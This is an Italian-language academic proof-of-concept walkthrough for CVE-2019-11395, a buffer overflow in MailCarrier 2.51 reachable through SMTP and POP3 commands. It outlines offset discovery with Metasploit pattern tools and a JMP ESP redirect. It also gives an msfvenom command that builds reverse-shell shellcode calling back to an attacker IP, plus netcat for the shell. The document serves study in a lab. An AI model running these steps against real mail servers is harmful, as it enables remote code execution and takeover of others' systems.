
Prova di concetto con finalità accademica per comprendere la vulnerabilità di Buffer Overflow, usando come base la CVE-2019-11395
Questo Proof of Concept (PoC) dimostra una vulnerabilità di Buffer Overflow in MailCarrier 2.51, che consente ad attaccanti remoti di eseguire codice arbitrario tramite una stringa lunga. La vulnerabilità può essere sfruttata utilizzando i seguenti processi:
SMTP RCPT TOPOP3 USERPOP3 LISTPOP3 TOPPOP3 RETRIl progetto mira a fornire un approccio accademico per comprendere come funziona il Buffer Overflow.
Prima di eseguire qualsiasi test, non usare mai l'ambiente di produzione per la sperimentazione iniziale. Crea invece un ambiente di laboratorio simile a quello di produzione per evitare problemi o conseguenze indesiderate.
msf-pattern_create -l <number_of_bytes>
Questo aiuta a determinare l'Offset, ovvero il numero esatto di byte necessari per sovrascrivere l'EIP.
msf-pattern_offset -q <bytes_on_EIP_register> -l <number_of_bytes>
Questo identifica il numero esatto di byte necessari per ottenere il controllo dell'EIP.
JMP ESP
CALL ESP
Utilizzeremo questo indirizzo per reindirizzare l'esecuzione. Presta attenzione ad ASLR, SafeSEH o altri meccanismi di protezione.
msfvenom -p <shellcode> LHOST=<Attacker_IP> LPORT=443 -b "<badchars_list>" exitfunc=thread -f python
NOP (\x90) nel payload per migliorare la stabilità.netcat (nc) per creare una reverse shell e connetterti al target.